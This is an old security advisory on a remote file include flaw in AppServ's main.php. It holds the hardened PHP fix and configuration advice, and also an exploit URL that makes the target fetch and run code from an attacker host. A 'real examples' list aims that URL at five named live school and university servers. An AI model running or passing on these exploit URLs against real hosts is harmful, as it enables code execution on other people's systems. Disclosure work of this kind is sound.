SECURITYVULNS:DOC:10914
Jan 07, 2006
Source: vulners.com
======================================================================
Remote file include in appserv 2.4.5 (possible in previous versions)

[ What is Appserv ]

AppServ is an Apache/PHP/MySQL open source software installer package.

Objective: easy to build a web server and database server

  • For those who are just beginning client/server programming.

  • For web programmers/developers using PHP & MySQL.

  • For programming techniques that are easily ported to other platforms such as WindowZ.

  • Single-step installation, no need to perform a multiple-step, time-consuming installation and configuration.

  • Ready-to-run just after you've finished installing.

  • If you hate the boring M$ IIS Webserver.

======================================================================

[ The bug ]

This is in the directory appserv, file main.php:

======================================================================

include("$appserv_root/lang-english.php");

There is another inclusion, include("$appserv_root/lang-thai.php");, built from the same variable. $appserv_root is never assigned in the script before it is used, so a request parameter of the same name sets it (the classic register_globals remote file include), and PHP will fetch and execute whatever URL the parameter points at.

======================================================================

[ Exploit ]

http://[target]/appserv/main.php?appserv_root=http://[attacker]/

======================================================================

[ Real examples ]

http://www.jr.ac.th/appserv/main.php?appserv_root=http://[attacker]/
http://140.116.83.224/appserv/main.php?appserv_root=http://[attacker]/
http://mail2.ttes.tcc.edu.tw/www2/appserv/main.php?appserv_root=http://[attacker]/
http://163.21.245.171/appserv/main.php?appserv_root=http://[attacker]/
http://trainer.ma.cx/appserv/main.php?appserv_root=http://[attacker]/

======================================================================

[ Fix ]

Remove the appserv directory (it has no real use).
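Where the directory cannot simply be removed, the include logic in main.php can be rewritten so the path never comes from the request. The following is an added example written for this advisory, not AppServ's own code: it fixes the base directory to the script's own location, maps a hypothetical `lang` request parameter onto an allow-list of the two language files named above, and refuses anything that does not resolve to a local file under that directory.

```php
<?php
// Added example, not AppServ's code: hardened replacement for the include
// logic in appserv/main.php. Assumes lang-english.php and lang-thai.php live
// in the same directory as this script.

// 1. The base path is a constant, never a variable the request can populate.
//    (__DIR__ needs PHP 5.3+; use dirname(__FILE__) on older releases.)
define('APPSERV_ROOT', __DIR__);

// 2. Allow-list: the request value is only ever used as an array key,
//    never concatenated into a path.
$langFiles = array(
    'english' => 'lang-english.php',
    'thai'    => 'lang-thai.php',
);

function pickLangFile(array $langFiles, $requested)
{
    // Unknown or missing language falls back to English.
    return isset($langFiles[$requested]) ? $langFiles[$requested] : $langFiles['english'];
}

// 'lang' is a hypothetical parameter for this example; the vulnerable script
// exposed the directory itself as $appserv_root.
$requested = isset($_GET['lang']) ? (string) $_GET['lang'] : 'english';
$langFile  = APPSERV_ROOT . DIRECTORY_SEPARATOR . pickLangFile($langFiles, $requested);

// 3. Defence in depth: the resolved path must be an existing local file
//    inside APPSERV_ROOT, so no URL wrapper or traversal can slip through.
$real = realpath($langFile);
if ($real === false || strpos($real, realpath(APPSERV_ROOT)) !== 0) {
    header('HTTP/1.1 400 Bad Request');
    exit('invalid language file');
}

include $real;
```

Alongside the code change, the PHP configuration should have register_globals = Off, so request parameters can no longer materialise as script variables, and allow_url_fopen = Off (and allow_url_include = Off on PHP 5.2 and later), so include() cannot fetch a remote URL even if an unvalidated path survives elsewhere. A web-access log filter for requests whose query string carries a parameter value starting with http:// or https:// is a cheap way to spot attempts against this class of bug.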

======================================================================
Author: Xez
Contact: [email protected]
Appserv website: www.appservnetwork.com